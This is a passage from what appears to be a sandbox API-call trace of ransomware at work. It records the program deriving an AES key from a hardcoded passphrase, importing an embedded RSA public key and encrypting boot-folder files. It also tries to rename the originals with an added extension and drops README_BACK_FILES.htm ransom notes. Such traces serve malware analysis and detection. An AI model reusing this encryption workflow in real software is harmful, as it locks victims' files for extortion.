dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.444] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.444] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.446] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.446] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.446] CryptHashData (hHash=0x27ff218, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.446] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff358) returned 1 [0140.446] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.446] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.446] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804988) returned 1 [0140.447] CryptImportPublicKeyInfo (in: hCryptProv=0x2804988, dwCertEncodingType=0x1, pInfo=0x2800b30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800b60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800b68*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fe818) returned 1 [0140.447] CryptEncrypt (in: hKey=0x27fe818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.447] CryptEncrypt (in: hKey=0x27fe818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804878*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804878*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.447] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804878*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804878*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.448] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.448] CryptEncrypt (in: hKey=0x27ff358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.448] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.449] CloseHandle (hObject=0xffffffff) returned 1 [0140.449] CloseHandle (hObject=0x5d54) returned 1 [0140.449] CopyFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.454] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.454] DeleteFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.gsg")) returned 1 [0140.456] MoveFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.fuck")) returned 0 [0140.456] CryptDestroyHash (hHash=0x27ff218) returned 1 [0140.456] CryptDestroyKey (hKey=0x27ff358) returned 1 [0140.456] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.456] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.456] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0140.456] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sr-latn-cs\\readme_back_files.htm")) returned 0xffffffff [0140.457] AreFileApisANSI () returned 1 [0140.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0140.457] CreateFileW (lpFileName="C:\\\\Boot\\sr-Latn-CS\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sr-latn-cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.457] GetFileType (hFile=0x5d50) returned 0x1 [0140.457] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.458] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.458] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sr-Latn-RS\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0140.459] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.459] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.459] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.459] GetLastError () returned 0x0 [0140.459] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui")) returned 0x20 [0140.459] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.459] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.459] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.460] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.460] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.463] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.463] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.463] CryptHashData (hHash=0x27ff358, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.463] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.463] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.463] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.463] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804b20) returned 1 [0140.463] CryptImportPublicKeyInfo (in: hCryptProv=0x2804b20, dwCertEncodingType=0x1, pInfo=0x2800c00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800c30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800c38*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fe798) returned 1 [0140.463] CryptEncrypt (in: hKey=0x27fe798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.464] CryptEncrypt (in: hKey=0x27fe798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804a10*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804a10*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.464] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804a10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804a10*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.465] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.465] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.465] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.465] CloseHandle (hObject=0xffffffff) returned 1 [0140.465] CloseHandle (hObject=0x5d54) returned 1 [0140.467] CopyFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.472] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.472] DeleteFileA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.gsg")) returned 1 [0140.474] MoveFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.fuck")) returned 0 [0140.474] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.474] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.474] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.474] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.474] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.474] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sr-latn-rs\\readme_back_files.htm")) returned 0xffffffff [0140.474] AreFileApisANSI () returned 1 [0140.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d2b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0140.475] CreateFileW (lpFileName="C:\\\\Boot\\sr-Latn-RS\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sr-latn-rs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.475] GetFileType (hFile=0x5d50) returned 0x1 [0140.475] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.476] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.476] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sv-SE\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0140.476] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.476] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.477] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.477] GetLastError () returned 0x0 [0140.477] GetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0140.477] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.478] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.478] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.478] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.479] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.481] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.481] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.481] CryptHashData (hHash=0x27ff358, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.481] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff4d8) returned 1 [0140.481] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.481] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804ba8) returned 1 [0140.482] CryptImportPublicKeyInfo (in: hCryptProv=0x2804ba8, dwCertEncodingType=0x1, pInfo=0x27ff6e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ff710*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ff718*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fed98) returned 1 [0140.482] CryptEncrypt (in: hKey=0x27fed98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.482] CryptEncrypt (in: hKey=0x27fed98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804cb8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804cb8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.482] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804cb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804cb8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.483] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.483] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.483] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.483] CloseHandle (hObject=0xffffffff) returned 1 [0140.483] CloseHandle (hObject=0x5d54) returned 1 [0140.547] CopyFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.552] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.552] DeleteFileA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.gsg")) returned 1 [0140.553] MoveFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.fuck")) returned 0 [0140.554] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.554] CryptDestroyKey (hKey=0x27ff4d8) returned 1 [0140.554] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.554] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.554] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.554] GetLastError () returned 0x5 [0140.554] GetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui")) returned 0x20 [0140.554] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.554] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.555] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.555] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.555] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.558] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.558] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.558] CryptHashData (hHash=0x27ff358, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.558] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.558] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.558] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.558] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804dc8) returned 1 [0140.558] CryptImportPublicKeyInfo (in: hCryptProv=0x2804dc8, dwCertEncodingType=0x1, pInfo=0x27ff880*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ff8b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ff8b8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fecd8) returned 1 [0140.558] CryptEncrypt (in: hKey=0x27fecd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.559] CryptEncrypt (in: hKey=0x27fecd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804ed8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804ed8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.559] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804ed8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804ed8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.560] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.560] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, 